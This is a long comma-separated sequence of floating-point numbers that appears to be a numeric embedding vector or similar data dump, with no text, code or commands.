0.0028251687,-0.008262179,-0.0076131998,-0.017441336,-0.014906327,0.0070960335,-0.0038491164,-0.002745178,-0.018252252,-0.0026325623,0.031792324,-0.0029572283,0.0367177,0.0032021222,0.07322081,0.0050688195,-0.016585378,0.018027995,-0.0151760075,-0.013033059,0.013486849,0.02175503,-0.006059382,-0.0036596565,-0.0075787627,-0.004245148,-0.009808517,0.017752567,0.013708344,0.0040280847,-0.01819978,0.0032611284,-0.023075454,-0.022169199,0.025102742,-0.008147836,-0.0076080444,0.021789316,0.023469385,-0.0021622,-0.0131317815,-0.005003197,-0.014842636,-0.01319459,-0.00075395376,-0.016153736,-0.006505352,-0.014852395,-0.02038556,0.007921871,0.01348005,-0.0038113631,-0.018908367,-0.0072594914,-0.01304257,0.0010500612,-0.016828438,-0.0012251509,-0.0158092,0.013419158,0.017660467,0.0015202943,0.00317559,0.0014515843,0.008153882,0.026974237,-0.015538334,0.023750423,-0.008622444,-0.0055881967,0.01799152,-0.02062088,0.021332262,0.023163317,0.04661236,0.014462991,-0.024898496,0.023122588,0.0072343503,0.041252088,-0.0020148414,-0.009559507,-0.032005984,0.0017554847,-0.0041466267,0.012500496,0.010183238,0.005730347,-0.01427566,0.0016315894,-0.00033038764,0.0016216494,-0.012154818,-0.0059097246,-0.018511947,0.003890063,0.005015649,0.0072648036,-0.020641726,0.0026325267,0.015255572,-0.008559269,0.011202544,-0.013457152,0.021488851,0.01991108,0.019275479,-0.017105103,0.029731197,0.008922519,0.02090934,-0.031608794,-0.0110077765,-0.0017756725,-0.012064141,0.016995637,0.0053866925,-0.006199825,-0.005532664,-0.019714575,-0.00461663,-0.016323043,0.00027650382,0.025471987,-0.0040789987,0.0025318335,-0.00078281417,0.007998914,0.009655451,-0.01436537,0.0036111183,0.0057370616,-0.017550105,0.02148559,0.027813317,0.02572601,0.011880446,0.0013521359,-0.017351724,0.008489027,-0.0165121,0.018497098,0.01751741,0.022152696,0.013335846,0.013186368,-0.0020705743,-0.05316801,-0.022309683,0.006875208,0.008544438,-0.018756194,0.02943899,-0.0001049207,-0.0025050584,0.01675386,0.0130331535,0.008855066,0.0063872174,0.012816091,0.016131679,-0.002539265,0.02606173,-0.0011823876,-0.012537235,-0.01022997,-0.0074052177,-0.011598922,0.011324667,0.010392411,0.018784037,-0.0035200105,0.0006424382,-0.01819208,0.031151073,-0.034494724,0.020435942,-0.0089313965,-0.019306624,0.007969219,0.010135389,0.10437378,0.008316229,-0.0223266,0.014209535,0.0111993095,-0.0060812044,-0.0032671764,0.015141349,-0.01688588,0.0049135047,0.0018817493,-0.0017326606,-0.0034728448,0.021933157,-0.008222555,-0.0073623536,0.011752861,-0.009049654,0.0036794727,-0.0009997534,-0.0043365564,0.002347879,-0.034547735,-0.045293808,-0.016152294,0.0022152937,0.011654539,0.017810792,0.01354558,-0.012146062,-0.032612085,0.021071622,0.0041878517,0.00096449326,0.0050367503,0.0084289145,-0.0028753094,0.004053356,0.008997202,0.035879094,0.0017037729,-0.001371881,0.029536571,0.016168961,0.01450251,-0.03244319,-0.030413551,0.010413432,0.009156442,-0.012867395,0.0059089577,0.01792012,0.0010435728,-0.013608215,-0.0166315,-0.012362364,0.023066314,0.016458552,-0.023159523,0.004301849,-0.000027302784,0.0066200965,-0.0032696151,-0.023275563,0.010064139,0.008178943,-0.0019353947,-0.016202427,-0.0063227797,-0.010065595,-0.0013105115,0.0053636557,0.014751998,0.00791167,0.005614206,-0.0020056413,0.024970394,0.017219169,0.016031802,-0.012579045,0.009579282,0.008798924,0.008932375,-0.018868217,0.0053655766,0.008198425,-0.020804133,0.008311398,-0.0041930885,-0.03114817,0.0036938456,0.0063731438,0.010241158,0.0020948045,-0.0040166453,0.017939994,-0.009957285,-0.0028040556,-0.001497613,-0.0065711965,-0.031430323,-0.034412965,-0.031640947,0.024814222,0.00039618576,0.028303502,0.008245075,0.0042614057,0.008460695,-0.0141033735,-0.0038019728,-0.070505776,0.018422121,0.0070335744,0.03396997,-0.019928508,0.04901893,-0.023853382,0.00879203,0.011541795,-0.006808276,-0.003613467,0.0020120223,-0.004367759,-0.0056370404,0.025883967,0.0042107888,-0.022847328,-0.026832035,-0.005248845,-0.03369058,0.01885047,0.041449826,-0.00053647644,0.0032648027,0.0025525223,0.006626289,-0.009131668,-0.0052058487,0.0019417257,-0.008264478,-0.004982313,0.0014461038,-0.019704618,-0.010359129,0.00024004657,-0.003702862,-0.0068862136,0.005661468,0.0031468035,-0.003851646,0.030611312,-0.026756957,-0.006031893,0.0064832303,0.00061876525,0.0026109677,-0.0011652317,-0.001211928,-0.0064309593,0.025706196,-0.0073577976,0.004440055,0.00088624714,0.0070690257,-0.0008249174,0.012388091,-0.004091071,0.028280146,-0.011452282,-0.006615258,0.005037561,0.005622972,-0.0020431278,0.005978441,0.00720589,0.013139205,-0.0035000336,-0.0013161305,-0.0016287954,0.018568534,-0.0010431272,0.018237224,0.01670642,0.013053276,0.011224658,0.007707021,-0.00019193688,0.029188449,0.004917802,0.0010731003,0.0035766426,0.0003215667,-0.027974265,0.014580166,0.0077154324,-0.019587552,0.0063447375,-0.009814577,0.0055780117,-0.023568938,-0.005648312,0.013899855,-0.023277726,-0.0015731793,0.00071136205,0.0073045925,-0.030295013,-0.03823071,-0.022045325,0.031911425,0.022061573,-0.02221522,-0.014057579,-0.007885443,-0.000027507138,-0.011987893,-0.033853065,0.0038716563,-0.010822504,0.028995395,0.003277843,0.028547382,0.006492994,-0.0056272736,0.019426685,0.042898163,-0.017944176,0.030281525,-0.0059754616,-0.000025960395,0.013793029,0.036066674,0.008250242,-0.017648507,-0.009867292,0.0060794754,-0.009777669,-0.019549403,-0.0042118393,0.029638175,0.033166762,-0.003941931,-0.037479673,0.0099575175,-0.0076150536,-0.0039096572,0.0058854865,-0.025687473,-0.028776752,0.010267385,0.006775669,-0.007914626,-0.008046771,-0.016314777,0.04700237,-0.01614642,0.0069547705,0.0093685165,0.0029065628,0.030412998,0.016804995,0.025541717,-0.022637628,-0.010574432,-0.0039193137,0.03287188,-0.00064297096,0.008378434,-0.013411207,-0.010331014,-0.024551021,0.0021568951,-0.00072029297,-0.013853144,0.008506694,0.0007382266,-0.0269897,0.016399425,-0.007978388,0.009883497,-0.005542617,0.011651798,-0.00924872,-0.01678718,0.011375738,-0.017602496,-0.017584965,0.010294247,0.003207643,-0.006531374,-0.0055229124,-0.013320129,-0.03665702,0.0051181666,-0.016634054,0.018823268,0.02665416,-0.004841464,-0.016368102,0.013307535,0.008411776,0.001095648,0.008850138,-0.028960977,-0.010045704,-0.00617651,0.00009357408,0.018105417,0.00510749,-0.0065683774,0.03418476,0.00056185125,-0.040195227,0.025509598,0.011966182,-0.004786491,-0.007076747,0.0053745867,-0.006843637,-0.01227856,0.011436546,0.007017777,0.003852856,0.004782621,0.011738458,0.0041072923,0.010431962,0.010880783,-0.007554271,0.0016417978,0.015272692,-0.015094716,0.0017930268,0.00010682442,-0.013999781,-0.0022088771,0.01698815,0.025517687,0.0016220389,0.0016222448,-0.006744439,0.0062960787,-0.003956316,-0.010828093,0.0010002805,-0.018749801,0.010911241,0.003040034,0.002160205,0.015105653,0.006705854,-0.013151361,-0.007417299,0.020263774,0.00008596799,0.0011184637,0.0019577625,-0.011285597,-0.012640778,-0.010862716,-0.0052023465,-0.030871008,-0.008294521,-0.004836028,0.008027667,0.029311929,0.011857872,-0.0041072103,0.009686594,-0.0045360387,0.019247789,0.013764042,0.0001361539,0.008438582,0.018606866,0.014650676,0.007716649,0.0038149522,0.000067331915,0.022814352,-0.00035182465,0.013293482,-0.0006857985,0.019412423,0.01887425,-0.00073536806,-0.00826184,-0.012714591,0.01664364,-0.017968392,-0.013929182,0.02287654,0.026643485,-0.00805214,-0.008556978,-0.009129638,-0.0065901848,0.017058013,0.009949346,-0.0033884163,-0.005353988,0.014788388,0.004122734,-0.023512622,0.009691048,-0.0077218623,-0.072557025,0.021485161,0.021088997,-0.012264525,0.0075314674,0.0024387382,0.015474723,0.0035085005,0.031663053,-0.015093755,-0.0055542584,0.0060556913,-0.018306594,-0.013865836,-0.0026922796,-0.032182004,-0.023002155,0.008528975,0.015569567,-0.010205709,0.011966755,0.0068240897,-0.0021502716,-0.005648658,0.01893425,-0.004853712,-0.0033054592,0.0005508622,-0.0031198522,0.01296571,0.016890189,0.015824676,-0.007231413,-0.0021239985,0.002070298,-0.033790294,-0.00020655038,0.0066790143,-0.010688794,0.0030070122,-0.012827711,-0.00011773036,-0.022511669,0.034726415,-0.009451041,-0.007986178,0.006359211,-0.019374996,-0.015141418,-0.048403945,0.008627793,-0.021534257,-0.005084899,0.023094714,0.004315304,0.011427273,0.00609286,-0.0022727617,0.0035824361,-0.009886829,0.00483923,-0.010500002,-0.004272557,0.022680478,-0.011950509,-0.013952961,-0.007786415,-0.00899281,-0.010817128,0.009343789,-0.00545722,-0.0030043963,-0.000032577915,0.008996554,-0.0157364,0.035117984,0.0051090005,-0.014366642,-0.0015340085,0.012753117,0.0071669077,-0.0036360163,-0.010657452,0.007842376,-0.012890441,0.015386467,-0.0031486116,0.01207546,0.0022897548,-0.03427233,0.013010088,-0.011733774,-0.0041220402,0.018973183,-0.015945174,0.03267385,0.020945173,0.034462593,0.002430687,-0.003890421,0.0017167683,-0.0119029535,-0.017043982,0.028204564,0.016172191,0.00044109474,-0.0024311924,-0.026281785,0.004258187,0.02107717,-0.009650352,-0.026087973,-0.018076286,0.008541741,0.019423254,-0.021078587,-0.010794065,0.01290123,0.04748671,0.0063934894,0.004040063,-0.018816162,0.008995005,0.0003426863,-0.015053614,-0.013937287,0.013443374,0.0022695367,-0.015287837,0.015557358,-0.014498921,0.015679652,-0.008214861,-0.018436959,0.013497087,0.007765768,-0.013414167,-0.008240243,-0.012928751,0.014794261,-0.008449647,-0.015614804,-0.01748409,0.011500547,-0.0071881237,-0.0017117723,-0.0066385213,0.0014859015,-0.002750892,0.009383619,-0.00415331,-0.009594091,-0.010189478,0.0037556195,-0.013787942,0.023812711,0.014338899,-0.018986344,-0.0077842805,0.014981283,-0.007946019,-0.016691823,0.009090741,-0.0129729295,-0.023186233,-0.0011051635,-0.0035361168,0.002808644,-0.027017903,-0.011910242,0.008198597,0.0039501167,0.014544077,0.012879465,0.034186944,-0.0055300146,0.027066294,0.0041901954,-0.012149199,0.004955478,0.016917663,0.028597673,0.013763132,0.0138744535,0.021949567,-0.013552797,-0.0075006387,0.0025387849,-0.0348857,-0.02928403,0.0017594037,0.016768076,0.0019695126,0.013956944,-0.028768906,0.008728271,-0.007843085,0.017714972,-0.022339424,-0.0011879017,-0.025575547,0.025010375,-0.0021990216,-0.021361606,-0.020059548,0.0028454734,0.015034668,-0.02183017,-0.0058339136,-0.011073348,-0.015672335,-0.0121727735,-0.030609908,0.0068260645,-0.020148594,-0.0063624354,-0.012618113,0.0024773611,0.024561394,-0.030367592,-0.004514089,0.0052755876,-0.0020965177,-0.0071911854,0.0007251839,-0.015762886,0.016977878,-0.017905619,-0.0051078075,0.0031378602,0.0155410515,-0.018059775,0.030966543,0.0063424497,-0.0070200907,0.007745496,-0.007954232,-0.005578158,-0.017840998,-0.019064998,-0.0018812956,0.012101958,-0.0058121337,0.013465352,0.009383455,0.024524067,-0.00022648515,-0.014834466,0.0065765018,0.0013668615,-0.0052331653,0.0052045556,-0.010123339,0.010367959,-0.039406482,-0.0030115668,-0.006157696,-0.020880345,-0.00032775934,-0.0064222137,-0.0038221632,-0.020313423,-0.0051854155,-0.010663316,0.021932848,-0.0015021877,0.035456195,0.014929374,0.008508194,-0.0085358815,-0.017916702,0.01129873,-0.0030097463,-0.009652437,-0.0006790274,-0.015714722,-0.0104513895,-0.007338051,0.008497096,0.014928369,0.02784929,-0.0208818,0.015115266,-0.024413316,0.019303592,0.013249328,0.0051459777,-0.037002753,0.02524128,0.0049558845,-0.0063859713,0.004358835,-0.0041300957,0.013155864,0.030715434,-0.011669385,0.015370893,-0.016611777,0.01772518,-0.022163196,0.060533628,-0.0016451597,0.0077313683,-0.018301181,-0.0010413443,-0.017787574,0.00095020497,0.0016706457,0.0022062971,-0.009850664,-0.026286762,-0.022570916,0.004247072,-0.025972899,0.018094504,0.009892391,0.0053129066,-0.018222556,-0.0049395263,-0.0025274013,0.02060216,-0.006383924,0.0024364616,0.029193325,-0.017777318,0.042373154,0.014050952,0.008647665,-0.031003848,-0.003847252,0.0032261203,-0.028529469,0.0014104447,0.0007601007,-0.021704396,-0.0005899429,0.031957675,-0.017274294,-0.00035790208,-0.0070932475,0.007556421,-0.016350394,0.082416385,-0.0050337864,0.0024963277,-0.017045692,-0.002300904,0.009980727,0.03435266,-0.019985268,0.015705869,0.025092956,-0.00014768116,0.00074818253,0.014025628,0.02649482,0.0102894325,0.010998448,0.018667806,0.011385394,0.017762415,-0.005853107,-0.015542034,0.020025397,-0.0012466356,-0.0008853513,0.006249135,-0.021939656,0.0075093205,-0.015769802,-0.01895706,-0.009255059,-0.012443943,-0.023653107,0.018502679,0.0104802335,0.026455466,-0.031623915,0.00365618,-0.0045400374,-0.0016640546,-0.022622107,0.014558832,0.00035266447,-0.0021877068,-0.025477879,0.026996613,-0.018354826,0.07344465,0.01861132,0.024234692,0.0018461645,0.013056519,0.02602984,-0.01348782,0.005578666,0.01306629,-0.001339111,0.0036970275,0.014915898,-0.0066552125,-0.0013244627,0.018626263,-0.0017952606,0.0007761657,-0.0025756883,0.0119467685,-0.0057932893,-0.00024170853,0.017399993,0.018747097,-0.0097709,-0.004878403,0.016375855,0.0017179931,0.021270629,0.0155284265,-0.0063888435,-0.010753948,-0.0059823804,0.015378724,0.01285206,0.008621388,-0.05663909,0.00543937,0.2067625,0.01265907,0.009951509,0.0050760573,0.0015706876,0.0027527534,-0.10055303,-0.0003980964,0.00027968362,0.00607745,-0.0015934794,-0.019584358,-0.018954957,0.010430886,0.00086985755,0.014238209,0.018121865,-0.03581145,0.012921584,-0.019542651,0.009741767,0.004686954,0.020251578,-0.0032716137,-0.012592181,-0.010967607,0.0187624,-0.010151939,-0.016106943,0.0035576627,-0.0034981293,-0.015972057,0.008281185,-0.014562265,-0.020234656,0.005143637,0.022818806,0.018138114,-0.011579632,-0.008741667,0.0026446248,-0.0024621645,-0.012542862,-0.047622267,-0.16860087,0.004597978,0.022945283,-0.042408466,0.019885357,0.0068137418,0.005342341,0.015015755,0.0023245958,-0.01627099,0.007653414,0.008220017,0.016848225,0.022178827,-0.01270258,-0.014234248,-0.021943897,0.006813639,0.020221697,-0.0001054279,0.016879458,0.010638198,-0.009483787,-0.020383928,-0.007260497,-0.0036873617,-0.017033588,0.00069653883,-0.02065377,-0.00092585204,-0.02661921,0.012000907,-0.0031137224,-0.015119754,-0.041411832,-0.029719654,-0.0010475161,-0.008939214,-0.02661441,0.011223304,0.009771174,-0.009025616,-0.004233508,-0.0021438354,-0.0039665187,0.04132225,0.014672281,0.009631173,-0.0062084678,0.010219036,0.019898657,0.0013430913,-0.043493573,-0.007866811,-0.01283307,0.0016884108,-0.010918841,0.00077478576,-0.008911432,0.0039775237,-0.0025849524,-0.013987495,-0.012610438,-0.011854659,0.017748483,-0.014288005,-0.0007603148,-0.021156207,-0.0050117467,0.0060100686,0.0032949238,0.012006758,0.027686207,-0.012376002,0.015962394,0.036842525,-0.017346673,-0.0005474377,0.009728177,-0.0005648889,0.030099338,-0.027499234,-0.0015970604,-0.008051316,-0.01843718,-0.017825415,-0.0036107353,-0.009875256,-0.0012015592,0.006816281,0.010510351,0.004313812,0.041000728,0.010985192,-0.007477541,0.01055165,0.01969729,0.011889692,-0.030858865,0.016133133,0.0048689395,-0.01786885,-0.019609146,0.007317938,-0.028704146,0.011651804,-0.0043720324,-0.010312703,-0.011636864,-0.0013856665,-0.00031295107,0.004622808,0.0037256915,-0.022005668,-0.02501155,-0.037597638,0.017618166,-0.0049700784,0.0046023214,-0.0030114476,-0.03790464,-0.010180288,0.0015853917,0.008632055,0.04824587,-0.008837032,-0.039922256,-0.0060658352,0.008840243,-0.02578264,-0.022602439,-0.0022158462,-0.004077714,0.019052694,-0.0017773085,0.013222598,-0.020050848,-0.010899923,-0.017627649,0.0042785294,-0.0016900057,-0.011727691,-0.015751876,-0.0019637076,0.013963482,-0.0047925417,0.033094153,-0.0049663726,0.012646803,-0.025923466,-0.019923743,0.037090283,-0.0042523104,-0.019475257,-0.013642553,0.097131856,-0.014203293,-0.0225888,0.021012327,-0.00026544931,-0.009494277,0.016359007,-0.019059742,-0.014766477,-0.03260228,-0.0069518783,-0.01984983,-0.023199262,-0.007824681,-0.020304168,0.007062042,0.013347119,0.0036045767,-0.010160168,0.0003355744,0.01922189,-0.0024126167,-0.0017945716,0.0404527,0.01756406,-0.010392575,-0.014345921,0.0007262214,-0.0074345176,-0.007850715,-0.0074658315,-0.01013073,-0.0017220877,-0.01884909,0.021395594,-0.045809202,-0.0073564416,0.00421815,0.008125911,0.013767754,0.004658953,0.006199547,0.0077154045,-0.009611202,0.011481686,0.03216589,-0.01500861,0.013639913,-0.017186036,-0.009577805,0.0019439262,0.012592552,-0.0033841003,-0.035458818,0.012764634,-0.02890612,0.012686246,-0.01141028,-0.021130336,-0.00591434,0.028987143,-0.0038699552,-0.012146035,0.005778417,-0.011778859,0.00928358,0.01596584,-0.0075750896,0.0122526055,0.038402848,-0.010887035,0.006584378,0.010497741,0.018997597,-0.021445414,-0.0037343677,-0.029070694,0.011129431,-0.0032477651,0.004428674,0.005219104,0.0022649423,-0.017326878,0.012190506,-0.011344582,-0.05776956,-0.0010176146,0.017959388,-0.0140499,0.012716537,0.009216389,0.008830911,0.030439783,0.0047844704,0.0064580953,-0.012640068,0.007965661,0.00031610925,0.0099924235,-0.00083616795,0.025256721,0.016807584,-0.021925097,-0.010307321,-0.008817668,-0.004154986,-0.006750677,-0.017822286,0.022999339,-0.026887417,-0.008415396,-0.012855834,0.014353257,-0.009480205,0.020620814,0.03350737,-0.022178981,-0.000015975605,0.007716453,-0.0064848876,-0.012353633,-0.007244022,0.01827884,-0.004996768,0.022741448,0.0006455526,-0.015572867,0.018572476,-0.027278429,0.010862448,-0.007507125,0.023904745,-0.0069168108,0.0040960526,0.0146810105,0.0012003811,0.0011641927,0.017900826,0.006362827,0.008206835,0.0035345454,-0.0007612089,0.0039011352,-0.010618942,-0.013923503,0.015008313,0.0106787,0.009858211,-0.02684378,0.006854316,-0.014900899,-0.016949203,-0.0024158435,0.0011140705,0.010789049,0.02186276,-0.025247697,-0.013256455,-0.011038652,-0.0038939351,-0.01251625,0.02217859,0.023224762,-0.006576893,-0.006104609,0.024776086,0.017106576,-0.015223876,0.02445254,0.0012198351,-0.009494886,-0.019796858,0.0056098257,0.023655968,-0.0024943089,0.0027809865,0.0013593711,-0.015096573,-0.015238802,0.036850017,0.015580088,0.00218334,-0.025362266,0.0045832335,0.015576921,-0.020894708,-0.0049194144,0.024029298,-0.0036405781,-0.0032673762,-0.007615077,-0.002690625,0.008398666,-0.015002597,-0.014443782,-0.0101696765,0.019893618,-0.03124615,0.021817356,-0.003202401,0.0019714467,0.0324035,-0.009926896,-0.016216852,0.025066353,-0.017704675,-0.022132235,-0.0041919416,-0.015993536,0.0045315768,-0.017955443,0.0016991197,-0.005892426,-0.023416232,-0.006720396,0.005854621,0.014283409,0.006125683,-0.013498575,-0.005803952,-0.006674379,-0.000617231,0.016255898,0.002959443,-0.038071785,0.0022258959,-0.023016384,0.060200054,-0.029909076,-0.0029954948,0.013495274,0.025333617,0.013234783,-0.0037419945,0.0026701044,-0.029472386,-0.0024923373,-0.0039871964,-0.029475981,-0.0032423055,0.014733421,0.0024398358,-0.0034632334,0.00004977421,0.018846964,-0.0046996023,0.010970854,0.00082103617,-0.0040022316,0.012252237,-0.0032436687,-0.020934377,-0.01931947,-0.0038765233,0.0064847777,-0.028286386,0.015768759,-0.013326362,-0.017271481,-0.029632332,-0.042567477,-0.001844607,-0.016992265,-0.0011928758,0.006621115,-0.0024068349,0.020921692,-0.00061067875,0.003386548,-0.000052494204,-0.029940166,-0.020380506,-0.0050270837,0.0209089,-0.015906017,-0.019439736,0.007835589,-0.001950728,0.006520211,0.010595368,-0.011343055,0.011292508,0.018773578,-0.0034950022,-0.0024707266,0.008665219,0.007643428,-0.008302746,0.0057045603,-0.015459003,-0.008109745,0.02005157,0.01376523,-0.01179322,-0.028015107,-0.012390243,0.014725891,-0.016310614,0.025578285,0.010285553,-0.0123439105,0.010728381,0.00038275603,0.013641497,-0.008962874,0.016587136,0.019919224,-0.014496211,-0.00017742338,-0.021423092,0.00029240712,-0.019434553,0.010677579,-0.021361317,-0.008244912,0.011277259,-0.0025403758,0.010556919,0.009289512,-0.021568673,-0.010529575,-0.0065969666,-0.014955446,0.009980312,-0.0009566367,0.006027101,-0.009445951,0.01101622,-0.0056333328,0.010598852,-0.015069603,-0.017291358,-0.01330894,-0.14848338,0.0065864013,0.009311574,-0.016253147,-0.01573425,-0.010414165,0.020111384,0.055662356,0.0062236865,-0.025112525,-0.0011309878,0.009362426,0.002291018,0.0013868319,-0.008867928,0.020706415,-0.0002530423,-0.020151088,0.010414324,0.0003479899,-0.007448515,0.018592102,-0.00065484835,-0.0050140177,-0.0076460782,0.03224592,0.005817529,0.01964757,0.01452627,0.016312933,0.0060751503,0.014127238,0.0068324474,-0.009460733,-0.013572104,0.015721777,-0.0013398515,0.020489931,0.015986478,0.011111729,-0.006332676,-0.01015169,-0.0035954816,0.032474704,-0.0010057339,-0.009875967,0.01246012,-0.0029820052,0.025289824,-0.015885992,0.009608634,-0.011079795,0.024835173,0.0034884892,-0.006107131,-0.011229896,-0.027535668,0.003655099,0.0064039803,-0.005793197,0.006359034,0.0058388663,-0.0014235174,-0.0031843672,-0.01602205,0.0040384075,0.0070606805,0.0007169826,-0.02346303,0.0071439384,-0.015702257,0.0029861338,-0.0021906956,0.0062753,-0.013374494,0.0028570418,0.028384672,0.021629399,0.021223066,0.030184729,-0.012637665,0.015084704,-0.0020952371,0.008555838,0.0028982328,0.015817568,0.016051253,0.009921291,-0.0046766265,-0.0013163042,0.013157953,-0.010062658,-0.015720708,-0.010179641,-0.009144547,0.014221952,-0.00726171,0.02052839,0.03809685,-0.0073217633,0.010906955,0.002864667,-0.009146938,-0.003860708,-0.12804013,-0.016305504,0.020456769,0.00024779973,-0.0114310095,-0.002091924,0.001256652,0.0053561693,0.017362991,-0.009111853,-0.013339691,0.025137523,0.02028615,0.0043035676,0.0093855895,0.0053087394,-0.029354079,0.01589625,-0.005176239,0.00021641066,0.009560016,-0.033037625,-0.03387656,-0.0041611926,0.010904177,-0.006115378,-0.0061065336,0.024413604,0.022854121,-0.014765953,0.0038447534,-0.0019044589,0.010844496,0.020558862,-0.038849775,-0.048254993,0.020584686,0.016848534,-0.0031640287,0.007204062,0.017356347,-0.014225837,0.006348691,-0.0041556642,0.006390858,0.015550167,0.0068430626,0.0013159695,0.007296556,-0.0243707,-0.014804655,0.0107002575,0.0036375774,0.013231318,-0.00960422,-0.02204291,-0.00822994,-0.008176585,-0.02344918,0.020488353,-0.020049304,0.013564419,-0.00041615398,0.00062103575,0.007522769,0.022189304,0.000077335346,0.010908131,-0.00083748257,-0.012744528,-0.01398068,0.018476179,0.025759252,0.020040648,0.017974991,0.016902616,-0.0052549853,0.032685906,0.020831084,0.0026454702,-0.012537639,-0.0051092715,-0.024906378,0.02686099,-0.018790066,-0.007860567,-0.0017067129,0.02574044,-0.009479344,0.029270966,0.015128852,0.025844797,-0.02691805,0.005357831,0.018726174,0.013955211,0.012578698,0.0046729567,0.000323023,-0.0050439467,-0.03731622,0.00035866385,-0.0018713648,0.010198338,-0.0138864,0.0066559124,0.0031474254,-0.011705865,-0.0065609002,0.00271,0.0013306778,0.035636667,-0.029127458,0.014370779,-0.0035003799,-0.0039375937,-0.015263112,-0.015602225,-0.0016930518,0.013703879,0.00009115857,0.026083041,0.0027109773,-0.00455438,-0.0061020628,0.0072393934,-0.018173266,0.027786352,0.009686817,-0.0011948547,0.0050246282,-0.0072365743,-0.0051287487,-0.025907448,0.013672925,0.0063781333,0.004149078,-0.0110325,-0.0019621514,0.013084312,0.012359484,-0.017850129,0.024800822,0.0038354767,0.0063084615,-0.0023207637,-0.013083355,0.022053927,-0.0115553485,0.003587833,-0.01583874,-0.012983404,0.00411758,0.0058157216,-0.0062455614,0.0030543748,-0.029477889,-0.014619231,-0.0050586667,-0.005618369,0.0052957726,0.016728705,0.010941813,0.0032879652,0.010681014,-0.009014848,0.0075521464,0.0015909664,0.0025498138,0.005365641,-0.0010571121,-0.010996976,-0.0030898536,-0.02133637,0.01920504,0.045202874,0.029775603,0.031384766,0.014931905,0.013712966,0.031486567,-0.0024425287,-0.019539408,0.0071319835,0.011436292,0.0048543685,-0.01769157,0.02964049,0.017628077,-0.0033931641,0.037779488,-0.012986355,0.0020664935,0.005864839,0.0058859643,0.01192188,-0.001536857,-0.022645837,0.012932906,-0.009377048,-0.014058514,0.03061183,0.0028802382,-0.011826396,-0.010339635,-0.00088194676,0.0015471717,0.027032837,0.033119854,0.0021693502,-0.00808133,-0.005638438,0.005383211,0.013619457,0.016169019,0.024191977,0.0025185968,-0.0182393,0.004911326,0.0043605436,0.0030343954,-0.0072166394,0.011778214,-0.00059774955,0.00798012,0.035774834,0.030812828,-0.012638107,-0.021229573,-0.001810985,0.025490781,0.032276593,-0.0043079504,0.014845288,-0.013841526,0.0076542716,0.015116036,-0.012740318,-0.023698963,-0.00059005665,0.012401043,0.023442416,0.014105796,0.01171264,-0.0009110992,-0.0037899793,0.010586818,-0.0011829898,-0.002741603,0.021311663,-0.005861638,-0.010529156,-0.0011449937,-0.0024445872,-0.02995817,0.01720836,0.007299199,0.011664058,0.000973303,0.007252928,-0.009981888,0.005214513,-0.02903187,0.0111934915,-0.0045252894,-0.015610167,0.027183393,-0.011875643,-0.008714317,0.021967081,-0.015053941,0.005540686,0.0060985545,0.029608026,0.004640094,-0.0027756572,-0.027658848,0.011032482,-0.014244781,-0.008006037,-0.023724463,-0.01242945,-0.0123342015,-0.0032503346,-0.0009027258,-0.005638203,-0.015002187,0.0053592324,-0.0058899755,-0.0094852885,0.019550318,0.0049784137,0.0019029898,-0.022046167,-0.032837242,0.0064256913,0.035709593,-0.012243658,-0.0019671528,-0.004624705,0.008685305,-0.0034711375,-0.0051214593,0.0048430017,-0.013947939,-0.02689795,-0.008215742,0.004654824,-0.024757745,-0.013440589,0.022808654,-0.0003828227,-0.028093453,0.017900333,-0.0040070615,-0.0051420564,-0.012058122,0.0061599454,-0.025468124,-0.008592766,-0.0054656034,-0.009742383,0.04783367,0.0016045944,-0.00073926436,-0.0041870433,0.021272702,0.008825694,-0.016897596,0.013452217,0.018250499,0.006210219,-0.012112077,-0.018034691,0.01956729,-0.014049264,0.020270994,0.019706683,0.013386623,0.033506833,-0.007132868,0.0037624605,0.00593047,-0.01698015,0.0028006884,-0.0045714136,0.023474654,-0.003680044,0.024244357,-0.0051407246,-0.008133194,-0.0025802855,0.019346086,0.01603707,0.0033285934,0.023778047,-0.007548237,0.0022784409,-0.0018478998,-0.0012613379,-0.0163479,0.0030237706,-0.015631868,0.005289129,-0.005717811,-0.014263844,-0.008684383,0.0064818235,-0.014829563,-0.00922561,-0.012918948,-0.0032934987,-0.007887586,-0.0049090423,-0.02498804,-0.06835248,-0.007247642,0.0062366463,-0.008440735,0.009914435,0.0048716525,-0.015933119,0.015350834,0.0024987543,0.0208046,-0.010266779,-0.0039301687,0.016931167,0.0223548,0.019360559,-0.014446986,0.0038954602,-0.021944806,0.0018350815,0.006844168,-0.0014012677,0.028821316,0.0007831751,-0.005564073,0.0011415785,0.0014894238,-0.0012088565,-0.018513536,-0.023609422,0.020134127,0.00484927,-0.003154247,-0.009458954,-0.0139639815,-0.010538087,0.00889137,-0.009663824,0.006813882,0.0020561828,-0.015403661,-0.017795306,0.005902286,0.0055308547,-0.022906462,0.009687537,0.020123333,-0.024111142,-0.028762484,-0.008427682,0.0027100167,0.018924838,0.018465634,-0.0053756787,0.019804932,0.0179569,0.020065231,-0.004856745,-0.015789947,0.024631092,0.000031081796,-0.017619645,-0.01653111,0.033914432,-0.005440538,0.003498142,0.027408471,-0.0011624135,0.025244372,-0.020876959,0.017155726,0.005175992,-0.034996524,-0.028997086,0.013567862,-0.010739391,0.016724193,-0.005062754,-0.004232351,0.006762056,0.00858789,0.018222317,0.0019795238,0.0040738187,-0.0029539873,-0.005267153,0.01692926,0.008521898,0.0138068255,0.016284008,0.003700553,0.011319143,0.0056352434,0.006560739,-0.0076324744,-0.009637667,0.022141818,-0.026341535,-0.01649639,0.021559436,0.009158572,-0.0051827994,-0.0027945153,0.008236305,-0.02210248,0.011695615,0.009289686,-0.00967558,0.02015751,0.0038455266,0.014580437,-0.008471894,0.033964783,0.017846925,0.03636849,0.0085298605,0.016296256,-0.0030784057,0.01875193,-0.010746777,0.006667622,-0.026021894,-0.013426501,-0.004478628,0.011870665,0.0045260563,-0.012185343,0.00038677646,-0.01989381,-0.013590515,-0.00497401,-0.030811757,0.019325402,0.012085385,0.02308589,0.005350604,0.014144527,0.0051644905,0.005191741,-0.006127764,0.0057400684,-0.009373481,-0.020546898,-0.0052079284,-0.0034831043,-0.005503406,0.034290142,-0.019554859,-0.0052994243,0.00040878417,0.0037808893,0.006046854,-0.0036358386,-0.0046701417,0.011795145,0.005821956,0.0032304104,0.0023050897,0.01775193,-0.010721844,-0.014198736,-0.0069740885,0.019742148,0.0021436692,0.012298208,-0.0051277173,0.0070545767,0.0066945734,-0.0018382123,-0.0076543214,-0.03458758,-0.011183434,-0.011793755,0.004168379,-0.00660226,-0.026422689,-0.0014900313,0.04512644,0.0149036385,0.0026480183,-0.013333117,-0.007819963,0.00792645,0.0028039124,